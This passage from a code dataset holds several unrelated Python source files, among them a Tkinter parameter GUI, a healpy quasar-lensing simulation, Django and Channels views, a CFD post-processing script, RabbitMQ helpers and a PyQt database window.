self.params[param][\"type\"] == \"filelist\":\r\n for index, input_variable in enumerate(self.input_variables[param]):\r\n input_variable.set(param_value[index])\r\n else:\r\n input_variable = self.input_variables[param]\r\n \r\n if self.params[param][\"type\"] == int:\r\n 
input_variable.set(param_value)\r\n elif self.params[param][\"type\"] == float:\r\n input_variable.set(param_value)\r\n elif self.params[param][\"type\"] == bool:\r\n input_variable.set(param_value)\r\n elif self.params[param][\"type\"] == str:\r\n input_variable.set(param_value)\r\n elif self.params[param][\"type\"] == \"pair\":\r\n input_variable.set(\"[%d, %d]\" % (param_value[0], param_value[1]))\r\n elif self.params[param][\"type\"] == \"dir\":\r\n input_variable.set(param_value)\r\n else:\r\n raise RuntimeError(\"Unknown param type\")\r\n \r\n def open_file_browser(self, param, index):\r\n current_file = self.input_variables[param][index].get()\r\n current_dir = os.path.dirname(current_file)\r\n new_file = filedialog.askopenfilename(initialdir = current_dir, title = \"Select file\", filetypes = ((\"MESc files\", \"*.mesc\"), (\"all files\", \"*.*\")))\r\n if new_file:\r\n self.input_variables[param][index].set(new_file)\r\n \r\n def open_directory_chooser(self, param):\r\n current_dir = self.input_variables[param].get()\r\n new_dir = filedialog.askdirectory(initialdir = current_dir, title = \"Select directory\")\r\n if new_dir:\r\n self.input_variables[param].set(new_dir)\r\n \r\n def add_file_input(self, param):\r\n self.get_field_values()\r\n self.clear_gui()\r\n \r\n self.values[param].append(\"\")\r\n \r\n self.build_gui()\r\n self.set_field_values()\r\n \r\n def remove_file_input(self, param):\r\n self.get_field_values()\r\n self.clear_gui()\r\n \r\n self.values[param].pop()\r\n \r\n self.build_gui()\r\n self.set_field_values()\r\n\r\n def run_program(self):\r\n self.get_field_values()\r\n self.save_params()\r\n \r\n # we destroy everything and terminate the main loop\r\n self.root.destroy()\r\n self.root.quit()\r\n\r\n def show_param_description(self, param):\r\n description_window = Toplevel()\r\n description_window.geometry('400x200')\r\n description_window.attributes('-topmost', 'true')\r\n \r\n display = Label(description_window, text = self.params[param][\"description\"], wraplength = 380, anchor = 'w', font = 'TkDefaultFont 11')\r\n display.pack()\r\n \r\n def load_params(self):\r\n json_data = {}\r\n try:\r\n with open(\"mesc_params.json\", \"r\") as f:\r\n json_data = json.load(f)\r\n except Exception as e:\r\n print(\"Warning: no mesc_params.json was found, falling back to default parameter values\")\r\n \r\n # we iterate over the params we know about, and only use the values for valid params\r\n for param in self.params:\r\n if param in json_data:\r\n self.values[param] = json_data[param]\r\n \r\n def save_params(self):\r\n try:\r\n with open(\"mesc_params.json\", \"w\") as f:\r\n json.dump(self.values, f, indent = 4)\r\n except Exception as e:\r\n print(\"Warning: failed to write parameter values to mesc_params.json\")\r\n","repo_name":"Kata5/FemtoOnAcid","sub_path":"Onacid for Femtonics Microscopes/caiman_mesc/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":25132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26539059496","text":"# Data preparation, SGC+NGC\n\nimport pandas as pd\nfrom astropy.io import fits\nimport numpy as np\n\nDR12 = fits.open('../DR12Q.fits')\n\nq_dr12 = DR12[1].data[(DR12[1].data['PSFMAG'][:,1]<=22)& (DR12[1].data['PSFMAG'][:,1]>=5.)\n &(DR12[1].data['MI']<-23.78)&(DR12[1].data['MI']>=-28.74)\n &(DR12[1].data['Z_VI']<=3.4)&(DR12[1].data['Z_VI']>=2.2)\n &(DR12[1].data['FIRST_MATCHED']==0)\n &(DR12[1].data['BOSS_TARGET1']!=0)]\nq_dr12 = 
pd.DataFrame(np.array([q_dr12['RA'],q_dr12['DEC'],q_dr12['Z_VI'],q_dr12['PSFMAG'][:,1],q_dr12['MI']]).T,columns=('ra','dec','z','MAG','MI'))\n\n\n\n'''\nexclude SGC and plot maps\n'''\n\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\nimport healpy as hp\n\nn = SkyCoord(ra=q_dr12['ra'],dec=q_dr12['dec'],unit='deg',frame='icrs')\nng = n.galactic\nl,b = ng.l,ng.b\nq_dr12 = q_dr12[b>0]\n\ng = SkyCoord(ra=q_dr12['ra'],dec=q_dr12['dec'],unit='deg',frame='icrs')\ngg = g.galactic\nl = gg.l.degree\nb = gg.b.degree\n\nq_indice = hp.pixelfunc.ang2pix(32,l,b,lonlat=True) \nq_map = np.zeros(hp.nside2npix(32), dtype=np.float) \nfor i in range(len(q_indice)): \n q_map[q_indice[i]] += 1\n\nmask_q = np.zeros(len(q_map)) # construct QSO mask with Nside=32 \nfor i in range(len(q_map)):\n if q_map[i] == 0: # identify empty pixels\n mask_q[i] = 0\n else:\n mask_q[i] = 1 \n\nmask_q = hp.pixelfunc.ud_grade(mask_q,nside_out=2048) # upgrade the mask to Nside=self.nside\n\nmask_k = hp.read_map('../mask.fits')\n\n# simulate \n\nfrom pipeline_mock import *\n\n# uniform distribution\n\nz_min = 2.2\nz_max = 3.4\ns = 2/5\n\n\ndef mock_spectrum(Ckk,Ckq,Cqq,bias,fwhm_list):\n\n alm_k,seed = hp.sphtfunc.synalm(Ckk)\n alm_q1,seed = hp.sphtfunc.synalm(Ckq**2/Ckk,seed=seed)\n alm_q2,seed = hp.sphtfunc.synalm(Cqq-Ckq**2/Ckk)\n\n alm_q = alm_q1 + alm_q2 \n\n map_k = mask_k*hp.alm2map(alm_k,nside=2048)\n map_q = mask_q*hp.alm2map(alm_q,nside=2048)\n \n mask_kq = mask_k*mask_q\n\n re_spec = []\n for fwhm in fwhm_list:\n \n if fwhm!=None:\n mask_kq = hp.sphtfunc.smoothing(mask_kq,fwhm=fwhm) \n \n fkq = np.mean(mask_kq*mask_k*mask_q)\n \n re = hp.sphtfunc.anafast(map_k*mask_kq,map_q*mask_kq,lmax=1200)\n re = re/fkq\n re_spec.append(re)\n \n return re_spec\n \nkernel_size = [None,np.deg2rad(10/60),np.deg2rad(30/60),np.deg2rad(1)] \nround_N = 200\nbias = 2.5\n\n# uniform sample\nuniform_cl = [[],[],[],[]]\nuniform_l = []\nuniform_model = []\n\nn_tot = 2*10**8\nsample = np.random.uniform(z_min,z_max,n_tot)\nmodel = mock(sample,z_min,z_max,s,z_reso=100,lmax=1200)\nNpix = hp.nside2npix(2048)\nn_avg = n_tot/Npix\nshot_noise = 1/n_avg\n\nell_kq, Ckq = model.Ckq(b=bias,x=range(1200),line=True)\nell_kk, Ckk = model.Ckk(x=range(800),line=True)\nCkk[0] = 1E-20\nell_qq, Cqq = model.Cqq(b=bias,x=range(1200),line=True)\n#Cqq = Cqq + shot_noise\n\nfor i in range(200):\n re_spec = mock_spectrum(Ckk,Ckq,Cqq,bias=bias,fwhm_list=kernel_size)\n #l_mk,cl_mk = bin_corr(Ckq)\n uniform_model.append(Ckq)\n #uniform_l.append(l_mk)\n for j,spec in enumerate(re_spec):\n #l_re,cl_re = bin_corr(spec)\n uniform_cl[j].append(spec)\n print('uniform:%d finished'%i)\n\nnp.save('cl_full.npy',np.array(uniform_cl))\n#np.save('l.npy',np.array(uniform_l))\nnp.save('model_full.npy',np.array(uniform_model))\n\n\n\n","repo_name":"LittleLin1999/CMB-lensingxDLA","sub_path":"Apodization/kernel_size.py","file_name":"kernel_size.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27896406603","text":"from .managers import *\nfrom server.common.controllers import CrudController\nfrom ..residente.managers import *\nfrom ..domicilio.managers import *\nfrom ..movimiento.managers import *\nfrom ..invitado.managers import *\nfrom ..areasocial.managers import *\nimport os.path\nimport uuid\nimport json\n\n\nclass EventoController(CrudController):\n\n manager = EventoManager\n html_index = \"condominios/evento/views/index.html\"\n html_table = 
\"condominios/evento/views/table.html\"\n routes = {\n '/evento': {'GET': 'index', 'POST': 'table'},\n '/evento_insert': {'POST': 'insert'},\n '/evento_update': {'PUT': 'edit', 'POST': 'update'},\n '/evento_delete': {'POST': 'delete'},\n '/evento_validar_invitacion': {'POST': 'validar_invitacion'},\n '/evento_importar': {'POST': 'importar'},\n '/evento_reporte_xls': {'POST': 'imprimirxls'},\n '/evento_filtrar': {'POST': 'filtrar'}\n }\n\n def get_extra_data(self):\n aux = super().get_extra_data()\n us = self.get_user()\n objeto = []\n\n aux['objeto'] = objeto\n aux['residentes'] = ResidenteManager(self.db).listar_residentes(us)\n aux['invitados'] = InvitadoManager(self.db).listar_x_residente(us)\n aux['tipoeventos'] = TipoEventoManager(self.db).listar_todo()\n aux['areasociales'] = AreasocialManager(self.db).listar_todo(us)\n aux['tipopases'] = TipopaseManager(self.db).listar_todo()\n aux['eventos'] = EventoManager(self.db).listar_eventos_dia(us)\n\n return aux\n\n def insert(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n diccionary['user'] = self.get_user_id()\n diccionary['ip'] = self.request.remote_ip\n EventoManager(self.db).insert(diccionary)\n self.respond(success=True, message='Insertado correctamente.')\n\n def update(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n diccionary['user'] = self.get_user_id()\n diccionary['ip'] = self.request.remote_ip\n EventoManager(self.db).update(diccionary)\n self.respond(success=True, message='Modificado correctamente.')\n\n\n def delete(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n respuesta = EventoManager(self.db).delete(diccionary['id'],diccionary['enabled'], self.get_user_id(), self.request.remote_ip)\n\n self.respond(success=True, message=respuesta)\n self.db.close()\n\n def validar_invitacion(self):\n self.set_session()\n diccionary = json.loads(self.get_argument(\"object\"))\n indicted_object = EventoManager(self.db).validar_invitacion_lector(diccionary['codigoautorizacion'])\n if indicted_object:\n self.respond(indicted_object.get_dict(),success=True, message='/resources/images/aceptado.png')\n self.db.close()\n else:\n self.respond(success=False, message='/resources/images/rechazado.png')\n self.db.close()\n\n\n def filtrar(self):\n self.set_session()\n data = json.loads(self.get_argument(\"object\"))\n\n ins_manager = self.manager(self.db)\n fechainicio = datetime.strptime(data['fechainicio'], '%d/%m/%Y')\n fechafin = datetime.strptime(data['fechafin'], '%d/%m/%Y')\n user = self.get_user_id()\n arraT = EventoManager(self.db).get_page(1, 10, None, None, True)\n arraT['datos'] = ins_manager.filtrar(fechainicio, fechafin, user)\n\n self.respond(response=[objeto.get_dict() for objeto in arraT['datos']], success=True,\n message='actualizado correctamente.')\n\n","repo_name":"berthy7/sigas","sub_path":"server/condominios/evento/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71854152121","text":"#Script de post-traitement des donnees.\n\nimport optparse\nimport math\nimport os\n\n\ndef properties():\n # ouverture des fichiers\n nomFic = 'test_VEF.data'\n nomFic_prop='properties.dat'\n\n fic = open(nomFic,'r')\n fic_prop = open(nomFic_prop,'w')\n\n chaines = [\"# hauteur_marche\",\n \"BOTTO Paroi_flux_impose\",\n \"rho Champ_Uniforme\",\n \"Cp Champ_Uniforme\",\n \"# U0\",\n \"IN 
Frontiere_ouverte_temperature_imposee\"] # Texte a rechercher\n\n for ligne in fic:\n for chaine in chaines:\n if chaine in ligne:\n tLigne = ligne.split()\n if chaine==\"# hauteur_marche\":\n h=float(tLigne[2])\n if chaine==\"BOTTO Paroi_flux_impose\":\n Qw=float(tLigne[4])\n if chaine==\"rho Champ_Uniforme\":\n rho=float(tLigne[3])\n if chaine==\"Cp Champ_Uniforme\":\n Cp=float(tLigne[3])\n if chaine==\"# U0\":\n U0=float(tLigne[2])\n if chaine==\"IN Frontiere_ouverte_temperature_imposee\":\n T0=float(tLigne[4])\n\n\n fic_prop.write('%18.4f %18.4f %18.4f %18.4f %18.4f %18.4f' % (h,Qw,rho,Cp,U0,T0))\n\n fic.close()\n fic_prop.close()\n\n return h,Qw,rho,Cp,U0,T0\n\ndef ecrire_Stanton(sonde,h,Qw,rho,Cp,U0,T0):\n\n fichier_read=open(sonde,'r')\n fichier_write=open('Stanton.dat','w')\n\n ligne = fichier_read.readlines()\n n=len(ligne)\n\n for i in range (1,n):\n\n tligne=ligne[i].split()\n fichier_write.write('%18.8f %18.8f\\n' % (float(tligne[0])/h,Qw/(rho*Cp*U0*(float(tligne[1])-T0))))\n\n fichier_read.close()\n fichier_write.close()\n\ndef normalise_Stanton(fichier):\n\n fichier_read=open(fichier,'r')\n fichier_write=open('Stanton_normalise.dat','w')\n\n ligne=fichier_read.readlines()\n n=len(ligne)\n\n tligne0=ligne[1].split()\n max=float(tligne0[1])\n\n for i in range (2,n-1):\n tligne=ligne[i].split()\n if (float(tligne[1])>max):\n max=float(tligne[1])\n\n for i in range (1,n):\n tligne=ligne[i].split()\n fichier_write.write('%18.8f %18.8f\\n' %(float(tligne[0]),float(tligne[1])/max))\n\n fichier_read.close()\n fichier_write.close()\n\n\ndef normalise_profil_vitesse(fichier,h,U0):\n\n fichier_read=open(fichier,'r')\n fichier_write=open(fichier+'_normalise.dat','w')\n\n ligne = fichier_read.readlines()\n n=len(ligne)\n\n for i in range (1,n):\n\n tligne=ligne[i].split()\n fichier_write.write('%18.8f %18.8f\\n' % (float(tligne[0])/h,float(tligne[1])/U0))\n\n fichier_read.close()\n fichier_write.close()\n\ndef normalise_profil_temperature(fichier,h,T0):\n\n fichier_read=open(fichier,'r')\n fichier_write=open(fichier+'_normalise.dat','w')\n\n ligne = fichier_read.readlines()\n n=len(ligne)\n\n for i in range (1,n):\n\n tligne=ligne[i].split()\n fichier_write.write('%18.8f %18.8f\\n' % (float(tligne[0])/h,float(tligne[1])-T0))\n\n fichier_read.close()\n fichier_write.close()\n\ndef extract_utau(h):\n# extrait les valeurs de x et utau sur la face BOTTOM du domaine, au dernier temps. 
Ecrit fichier avec utau=f(x/h)\n# ATTENTION: PROCEDURE ADAPTEE A LA TAILLE DU MAILLAGE UTILISE\n\n# ouverture des fichiers\n nomFicUstar = 'test_VEF_pb_Ustar.face'\n\n ficUstar = open(nomFicUstar,'r')\n fichier_write=open('Ustar_bottom.dat','w')\n\n # lecture de ligne -> entetes\n fichier = ficUstar.readlines()\n\n #tant que la derniere ligne est vide\n while fichier[-1]==\"\" or fichier[-1]==\"\\n\":\n del fichier [-1]\n\n #on enleve les 55 dernieres lignes (jusqu'a la face bottom) avant les donnees sur la face qui nous interesse: attention a mettre le bon nb de lignes\n i=0\n while i < 55:\n\n del fichier [-1]\n i=i+1\n\n commentaire=\"\"\n i=len(fichier)\n cumul=0\n u=0.\n\n\n #on va prendre les valeurs de x et utau au dernier temps et sur la face \"bottom\"\n while commentaire!=\"----------------\":\n ligne=fichier[i-1]\n if ligne != \"\\n\" and ligne != \"\":\n tLigne = ligne.split(\"|\")\n commentaire = tLigne[0]\n if commentaire!=\"----------------\":\n #on eclate la ligne en un tableau de valeurs\n tLigne=ligne.split(\"|\")\n #on ecrit x et utau:\n x=float(tLigne[0])\n utau=float(tLigne[4])\n\n\n fichier_write.write('%18.8f %18.8f\\n' %(x/h,utau))\n i=i-1\n\n fichier_write.close()\n ficUstar.close()\n\ndef ecrire_xr(fichier,h):\n# fonction qui calcule la longueur de reattachement\n\n xr_expe=0.2508\n xr_expe_adim=6.6\n fichier_read=open(fichier,'r')\n fichier_write=open('longueur_reattachement.dat','w')\n\n ligne = fichier_read.readlines()\n n=len(ligne)\n\n i=n-1\n tligne2=ligne[i].split()\n tligne1=ligne[i-1].split()\n V2=float(tligne2[1])\n V1=float(tligne1[1])\n\n while (V1 > 0 and i>2):\n i=i-1\n tligne2=ligne[i].split()\n tligne1=ligne[i-1].split()\n V2=float(tligne2[1])\n V1=float(tligne1[1])\n\n x2=float(tligne2[0])\n x1=float(tligne1[0])\n\n if i==2:\n xr=0\n print('attention: pas de point de reattachement trouve, il semble ne pas y avoir de zone de recirculation')\n else:\n xr = x1 - (V1*((x2-x1)/(V2-V1)))\n\n error=abs(((xr-xr_expe)/xr_expe)*100)\n fichier_write.write('%18.2f %18.2f %18.2f %18.2f %18.2f\\n' %(xr,xr/h,error,xr_expe,xr_expe_adim))\n\n fichier_read.close()\n fichier_write.close()\n\nif __name__ == '__main__':\n\n parser = optparse.OptionParser()\n (options, args) = parser.parse_args()\n\n h,Qw,rho,Cp,U0,T0=properties()\n\n sonde_Twall='test_VEF_SONDE_TWALL.coupe'\n\n ecrire_Stanton(sonde_Twall,h,Qw,rho,Cp,U0,T0)\n normalise_Stanton('Stanton.dat')\n\n extract_utau(h)\n\n #profils de vitesse\n normalise_profil_vitesse('test_VEF_SONDE_V1_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V2_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V3_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V4_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V5_LONGI.coupe',h,U0)\n normalise_profil_vitesse('test_VEF_SONDE_V6_LONGI.coupe',h,U0)\n\n #profils de temperature\n normalise_profil_temperature('test_VEF_SONDE_T1.coupe',h,T0)\n normalise_profil_temperature('test_VEF_SONDE_T2.coupe',h,T0)\n normalise_profil_temperature('test_VEF_SONDE_T3.coupe',h,T0)\n normalise_profil_temperature('test_VEF_SONDE_T4.coupe',h,T0)\n normalise_profil_temperature('test_VEF_SONDE_T5.coupe',h,T0)\n\n\n #calcul de la longueur de reattachement\n 
ecrire_xr('test_VEF_SONDE_BOTTOM_GRAV.coupe',h)\n","repo_name":"cea-trust-platform/TrioCFD-code","sub_path":"share/Validation/Rapports_automatiques/Turbulence/RANS/Heated_Backward_Facing_Step_2D/src/Post.py","file_name":"Post.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"fr","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"74706672119","text":"from typing import Protocol\n\nimport aio_pika\nfrom pika.adapters.blocking_connection import BlockingChannel\nfrom pika.spec import Basic, BasicProperties\n\n\nclass T_on_message_callback(Protocol):\n \"\"\".\"\"\"\n\n async def __call__(\n self,\n ch: BlockingChannel,\n mh: Basic.Deliver,\n props,\n body: bytes,\n\n ) -> None: ...\n\n\nclass T_on_message_callbackAsync(Protocol):\n \"\"\".\"\"\"\n\n async def __call__(\n self,\n message: aio_pika.abc.AbstractIncomingMessage,\n ) -> None: ...\n\n\ndef getMessageSuccess(\n ch: BlockingChannel,\n mh: Basic.Deliver,\n props: BasicProperties,\n body: bytes,\n callback: T_on_message_callback = lambda: None\n):\n \"\"\"\n Успешное получение сообщения\n\n :param callback: Полезная функцию которую нужно выполнить\n :param ch: Канал откуда пришло сообщение\n :param mh: Данные про очередь\n :param props:\n :param body: Сырые данные от отправителя\n :return:\n\n .. code-block:: python\n\n rabbitmq.chanel.basic_consume(\n # Случайная уникальная очередь\n queue=rabbitmq.queue[0],\n # Что делать с полученным сообщением\n on_message_callback=partial(\n getMessageSuccess,\n callback=self_\n )\n )\n \"\"\"\n # Вызвать пользовательскую функцию\n callback(body=body, ch=ch, mh=mh, props=props)\n #: Подтвердить получение сообщения.\n #: Убедитесь что отключено авто п отверждение\n #: rabbitmq_chanel.basic_consume(auto_ack=False)\n ch.basic_ack(delivery_tag=mh.delivery_tag)\n\n\nasync def getMessageSuccessAsync(\n message: aio_pika.abc.AbstractIncomingMessage,\n callback: T_on_message_callbackAsync = lambda: None\n):\n \"\"\"\n Успешное получение сообщения\n\n :param message:\n :param callback: Полезная функцию которую нужно выполнить\n \"\"\"\n # Вызвать пользовательскую функцию\n await callback(message)\n","repo_name":"denisxab/rbmq_pack","sub_path":"rbmqsync/logic_massage.py","file_name":"logic_massage.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43060824211","text":"from app.views import *\nfrom app.services.user_service import *\nfrom app.services.group_service import all_groups\n\n@login_required\n@permission_required('auth.view_user')\ndef user_list(request):\n users = users_all(exclude_superadmins=True)\n context = {'users': users}\n return render(request, 'user/user_list.html', context)\n\n@login_required\n@permission_required('auth.add_user')\ndef user_create(request):\n form = UserForm()\n form.fields['groups'].choices = [(g.pk, get_string(g.name, request)) for g in Group.objects.all().exclude(name='student')]\n\n if request.method == 'POST':\n form = UserForm(request.POST)\n form.fields['groups'].choices = [(g.pk, g.name) for g in Group.objects.all().exclude(name='student')]\n if form.is_valid():\n data = form.cleaned_data\n list_data = [data[value] for value in data]\n if create_or_update_user(None, *list_data):\n messages.success(request, get_string('successfully created user', request))\n return redirect(user_list)\n\n messages.warning(request, get_string('this username is taken. 
please type another username', request))\n\n context = {'form': form, 'title': 'user', 'title1': 'creating', 'header1': 'user', 'header2': 'creating'}\n return render(request, 'main/create.html', context)\n\n@login_required\n@permission_required('auth.change_user')\ndef user_update(request, pk):\n user = get_user_by_pk(pk)\n if request.method == 'POST':\n form = UserForm(request.POST)\n form.fields['groups'].choices = [(g.pk, g.name) for g in Group.objects.all().exclude(name='student')]\n if form.is_valid():\n data = form.cleaned_data\n list_data = [data[value] for value in data]\n create_or_update_user(user, *list_data)\n messages.success(request, get_string('successfully updated user', request))\n return redirect(user_list)\n\n form = UserForm(initial={\n 'username': user.username,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'email': user.email,\n # 'password': user.password,\n 'groups': list(filter_groups_of_user(user).values_list('pk', flat=True)),\n })\n\n form.fields['groups'].choices = [(g.pk, get_string(g.name, request)) for g in Group.objects.all().exclude(name='student')]\n context = {'form': form, 'title': 'user', 'title1': 'changing', 'header1': 'user', 'header2': user.username}\n return render(request, 'main/edit.html', context)\n\n@login_required\n@permission_required('auth.delete_user')\ndef user_delete(request, pk):\n user = get_user_by_pk(pk)\n user.delete()\n messages.success(request, get_string('successfully deleted user', request))\n return redirect(user_list)","repo_name":"xiidot1303/miraziz_school","sub_path":"app/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36849867007","text":"import json\n\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\n\nclass HomeConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n user_id = self.scope[\"session\"].get(\"ws_user\")\n\n self.group_name = f\"user_{user_id}\" # Set the group name\n\n # Add the client to the group\n await self.channel_layer.group_add(self.group_name, self.channel_name)\n\n await self.accept()\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(self.group_name, self.channel_name)\n\n async def send_stock_update(self, event):\n # Send a custom message to the client\n await self.send(text_data=json.dumps(event))\n","repo_name":"Kepins/int-Django-Stock","sub_path":"djangostock/application/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73628655799","text":"class DomainInfo(object):\n\n def __init__(self, domainName=None, domainState=None, templateId=None, startDate=None, endDate=None, cloudDnsId=None, modified=None):\n \"\"\"\n :param domainName: (Optional) 域名\n :param domainState: (Optional) 域名状态 0失败 1正常 2预注册 3过期 4转出中 5已转出 6过户中\n :param templateId: (Optional) 模板ID\n :param startDate: (Optional) 域名起始时间\n :param endDate: (Optional) 域名结束时间\n :param cloudDnsId: (Optional) 京东云解析域名ID\n :param modified: (Optional) 最后变更时间\n \"\"\"\n\n self.domainName = domainName\n self.domainState = domainState\n self.templateId = templateId\n self.startDate = startDate\n self.endDate = endDate\n self.cloudDnsId = cloudDnsId\n self.modified = 
modified\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/domain/models/DomainInfo.py","file_name":"DomainInfo.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"33083485090","text":"##“a층의 b호에 살려면 자신의 아래(a-1)층의 1호부터 b호까지 사람들의 수의 합만큼 사람들을 데려와 살아야 한다”\n## 0층부터 있고 각층에는 1호부터 있으며, 0층의 i호에는 i명이 산다.\n## 재귀함수\n\ndef house(floor, room):\n if (floor == 0):\n return room\n else:\n sum = 0\n for i in range(1,room+1):\n sum = sum + house(floor-1, i)\n return sum\n\ntestCase = int(input())\nfor t in range(testCase):\n floor = int(input())\n room = int(input())\n print(house(floor,room))\n","repo_name":"kkhdss165/BOJ_PYTHON","sub_path":"2775.py","file_name":"2775.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23332619694","text":"'''\nn과 m\nn개의 자연수 중에서 m개를 고른 수열\n'''\ndef perm(i, n, m):\n if i == m:\n print(*p)\n return\n else:\n for j in range(n):\n if used[j] == 0:\n p[i] = arr[j]\n used[j] = 1\n perm(i+1, n, m)\n used[j] = 0\n\nimport sys\ninput = sys.stdin.readline\n\n# n개의 자연수, m개 선택\nn, m = map(int, input().split())\n\n# 자연수\narr = sorted(list(map(int, input().split())))\nused = [0] * n\np = [0] * m\n\nperm(0, n, m)","repo_name":"YUNA-AHN/TIL","sub_path":"Prac/boj 15654.py","file_name":"boj 15654.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"7656553304","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nfrom django.urls import path\n\nfrom recruit.views import api, analyze, files, docs\n\nurlpatterns = [\n path(r'wj/', api.WjView.as_view({\n \"post\": \"list\"\n })),\n\n path(r'wj/<int:pk>/', api.WjView.as_view({\n \"post\": \"single\",\n })),\n\n path(r'answer/', api.AnswerView.as_view({\n 'post': 'post',\n 'get': 'list'\n })),\n\n path(r'answer/<int:pk>/', api.AnswerView.as_view({\n 'get': 'single',\n })),\n\n path(r'respondentor/', api.RespondentsView.as_view({\n 'get': 'list',\n 'post': 'post'\n })),\n\n path(r'report/<int:pk>/', analyze.AnalysisCharacterView.as_view({\n 'get': 'get',\n 'post': 'post',\n })),\n\n path(r'file/', files.FileView.as_view({\n 'post': 'create',\n 'get': 'get',\n })),\n\n path(r'postion/', api.PositionView.as_view({\n 'get': 'list',\n })),\n\n path(r'admin-help-docs/', docs.background_docs),\n path(r'api_documentation/', docs.api_documentation),\n]\n","repo_name":"tao625/wechatRecruit","sub_path":"apps/recruit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30134618324","text":"from question_data import Question_list\nclass Question():\n def __init__(self,text,answer) :\n self.question_text = text\n self.question_answer = answer\n\nclass QuizBrain():\n def __init__(self,q_list):\n self.que_num = 0\n self.score = 0\n self.que_list = q_list\n\n def still_has_que(self):\n return self.que_num < len(self.que_list)\n\n def next_question(self):\n current_que = self.que_list[self.que_num]\n #print(current_que)\n self.que_num +=1\n user_ans = input(f\"Q.{self.que_num}:{current_que.question_text} (True/False) ?\\n\")\n self.check_ans(user_ans,current_que.question_answer)\n\n def check_ans(self,user_input,correct_ans):\n if user_input.lower()==correct_ans.lower():\n print(\"---- Yeah!! 
You got it right !! -----\")\n self.score +=1\n\n else:\n print(\"---- Ouch! That's a wrong answer ---- \")\n \n print(f\"Your score is :{self.score}/{self.que_num}\")\n print(\"--------------------------------------------\")\n#-----------------------------------------------------------------------------\n# ------------------- Main -------------\n\nQuestion_bank = []\nfor que in Question_list:\n que_text = que[\"text\"]\n que_ans = que[\"answer\"]\n # print(que_text,que_ans)\n new_que_obj = Question(que_text,que_ans)\n Question_bank.append(new_que_obj)\n#print(Question_bank)\nquiz = QuizBrain(Question_bank)\n\nwhile quiz.still_has_que():\n quiz.next_question()\n\nprint(\"-------------The Game is Finished------------\\n ----------Hope You Enjoyed------------\")","repo_name":"Shruti-s29/50-Python-Projects","sub_path":"17.Quiz_game_OOP/17.Quiz_game_OOP.py","file_name":"17.Quiz_game_OOP.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74871661561","text":"# Problem A: Help a PhD candidate out!\n\ninp = input()\ntest_cases = int(inp)\n\ns = []\ni = 0\nwhile i < test_cases:\n inp = input()\n s.append(inp)\n i += 1\n\ni = 0\nwhile i < test_cases: \n if s[i] == \"P=NP\":\n print(\"skipped\")\n else:\n res = [int(j) for j in s[i].split(\"+\") if j.isdigit()]\n print(res[0]+res[1])\n i += 1","repo_name":"dellod/CPClub","sub_path":"feb5/A_phd.py","file_name":"A_phd.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10357969664","text":"from PyQt5.QtWidgets import QWidget, QPushButton, QComboBox, QListWidget, QListWidgetItem\n\nimport UpdateDialog\nimport main\n\n\nclass UpdateWindow(QWidget):\n def __init__(self):\n super().__init__()\n\n # Instance Variable Declarations\n self.table_list = None\n self.record_list = None\n # After records have been imported from the database, store them in record_cache\n # Keys are table names, values are data. This saves load time when switching between tables.\n self.record_cache = {}\n # End of Instance Variable Declarations\n\n self.setup_window()\n\n def setup_window(self):\n self.setGeometry(100, 300, 1400, 700)\n self.setWindowTitle(\"Update Database Records\")\n self.table_list = QComboBox(self)\n self.table_list.move(50, 20)\n self.table_list.resize(200, 25)\n self.populate_table_list()\n self.table_list.currentIndexChanged.connect(self.populate_record_list)\n self.record_list = QListWidget(self)\n self.record_list.move(50, 80)\n self.record_list.resize(1300, 520)\n self.populate_record_list()\n update_button = QPushButton(\"Update\", self)\n update_button.clicked.connect(self.update_record)\n update_button.resize(update_button.sizeHint())\n update_button.move(50, 650)\n 